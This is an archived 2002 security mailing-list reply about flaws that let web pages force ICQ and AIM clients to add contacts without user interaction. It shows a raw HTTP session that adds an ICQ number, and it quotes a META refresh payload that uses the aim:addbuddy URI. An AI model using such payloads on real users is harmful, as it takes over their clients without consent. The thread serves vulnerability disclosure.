Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code

From: Bojidar Alexandrov (bojoat_private)
Date: Thu Jul 18 2002 - 00:33:45 PDT

Next message: Ulf Harnhammar: "[Full-Disclosure] Geeklog XSS and CRLF Injection"

Previous message: lumpy: "asciiSECURE advisory (2002-07-17/1)"
Next in thread: rwertenbat_private: "Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Knud,
This issue is still here, only address that you use is not longer valid,
because is changed...
At end is the http session (for my icq beware :)).
Also seems that no one take attention Jelmer's exploit for ICQ and MSIE.
It must be examined througly for other variants and complete solution must
be given to the comunity!
ATTENTION it is a HIGH security risk for clients - it works with almost any
ICQ and IE, and ICQ must be installed in default path, or script to "guess"
where, but anyway this is a very common case.


Http session for the icq:

GET http://wwp.icq.com/whitepages/add_me/?uin=71398287&action=add HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: bg,en-us;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Host: wwp.icq.com
Proxy-Connection: Keep-Alive

HTTP/1.0 200 OK
Date: Thu, 18 Jul 2002 07:12:12 GMT
Server: Apache/1.3.26 (Unix) mod_ssl/2.8.9 OpenSSL/0.9.6d
P3P: CP="ONL UNI COM PHY NAV INT DEM CURo OUR"
Content-Type: application/x-icq
Proxy-Connection: close

<!-- Vignette StoryServer 5.0 Thu Jul 18 03:12:12 2002 -->
[ICQ User]
UIN=71398287
Email=
NickName=
FirstName=
LastName=


----- Original Message -----
From: "Knud Erik Højgaard" <kainat_private>
To: "orb" <orbat_private>; <bugtraqat_private>
Sent: Monday, July 16, 2001 11:44 PM
Subject: Re: AIM forced behavior "issue"


> > Example
> > <META
> >
>
HTTP-EQUIV="refresh"CONTENT=0;URL=aim:addbuddy?listofscreennames=mindfliporg
> ,mfliporb,mflipmax,mflips0nic,mflipzorcon&groupname=mindfliporg>
> >
> > A web page loaded with the above code in it's META REFRESH tag would
> > automatically add a group to the users buddylist called mindfliporg and
> > add buddy's
> > mindfliporg, mfliporb, mflipmax, mflips0nic, mflipzorcon to the group.
>
> We tried some similar stuff with icq a while ago, live example at
> http://knudergud.dk/dev/icq.html ..
> it seems broken now, but the idea should be obvious. adding to a contact
> list using javascript, requiring
> no user interaction.. stupid software.
>
> -Knud
>
>

Next message: Ulf Harnhammar: "[Full-Disclosure] Geeklog XSS and CRLF Injection"
Previous message: lumpy: "asciiSECURE advisory (2002-07-17/1)"
Next in thread: rwertenbat_private: "Re: AIM forced behavior "issue" Re:ICQ and MSIE allow execution of arbitrary code"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jul 18 2002 - 13:50:36 PDT